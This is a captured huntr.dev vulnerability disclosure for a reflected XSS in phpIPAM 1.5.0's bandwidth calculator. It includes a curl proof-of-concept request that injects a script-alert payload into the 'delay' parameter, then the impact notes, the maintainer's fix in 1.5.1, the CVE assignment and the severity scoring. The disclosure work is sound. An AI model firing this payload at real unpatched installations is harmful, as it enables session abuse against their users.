huntr.dev
2600:9000:2435:ce00:14:bb32:5f00:93a1
Public Scan
URL:
https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b/
Submission: On February 08 via api from US — Scanned from DE
Form analysis
0 forms found in the DOM
Text Content
CROSS SITE SCRIPTING (XSS) REFLECTED IN PHPIPAM/PHPIPAM

Valid
Reported on Nov 1st 2022

--------------------------------------------------------------------------------

DESCRIPTION

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

PROOF OF CONCEPT

1. I open this page: localhost/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator
2. and I analyze the code at lines 41-45: https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next I tried with Burp Suite to intercept and then change the value of some parameters such as wsize, delay and fsize on lines 13-15 of https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php with the <script>alert(1)</script> payload
4. and I trigger the reflected XSS payload <script>alert(1)</script>

//PoC
curl -i -s -k -X $'POST' \
    -H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' \
    -H $'X-Requested-With: XMLHttpRequest' \
    -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' \
    -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -H $'Origin: http://192.168.1.15' \
    -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator' \
    -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' \
    -H $'Connection: close' \
    -b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
    --data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
    $'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'

IMPACT

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

* Perform any action within the application that the user can perform.
* View any information that the user is able to view.
* Modify any information that the user is able to modify.
* Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

REFERENCES

* reference Reflected XSS

--------------------------------------------------------------------------------

We are processing your report and will contact the phpipam team within 24 hours. 3 months ago
ZenalArifin modified the report 3 months ago
ZenalArifin modified the report 3 months ago
We have contacted a member of the phpipam team and are waiting to hear back 3 months ago
We have sent a follow up to the phpipam team. We will try again in 7 days. 3 months ago
We have sent a second follow up to the phpipam team. We will try again in 10 days. 3 months ago
We have sent a third and final follow up to the phpipam team. This report is now considered stale. 3 months ago
garyallan validated this vulnerability 2 months ago
Thanks for reporting
ZenalArifin has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
garyallan marked this as fixed in 1.5.1 with commit 94ec73 2 months ago
garyallan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 4th 2022

ZenalArifin commented 2 months ago (Researcher)
--------------------------------------------------------------------------------
thanks @garyallan for my first CVE <3

ZenalArifin commented 8 days ago (Researcher)
--------------------------------------------------------------------------------
hello @garyallan any update?

ZenalArifin commented 4 days ago (Researcher)
--------------------------------------------------------------------------------
Hello. The CVE for this vulnerability has not been published. When will you publish it?

garyallan published this vulnerability 4 days ago

--------------------------------------------------------------------------------

CVE: CVE-2023-0676 (assigned)
Vulnerability Type: CWE-79: Cross-site Scripting (XSS) - Reflected
Severity: Low (2.4)
Attack vector: Network
Attack complexity: Low
Privileges required: High
User interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None
Registry: Other
Affected Version: 1.5.0
Visibility: Public
Status: Fixed
Found by: ZenalArifin (@z3n70), master
Fixed by: garyallan (@garyallan), maintainer

This report was seen 185 times.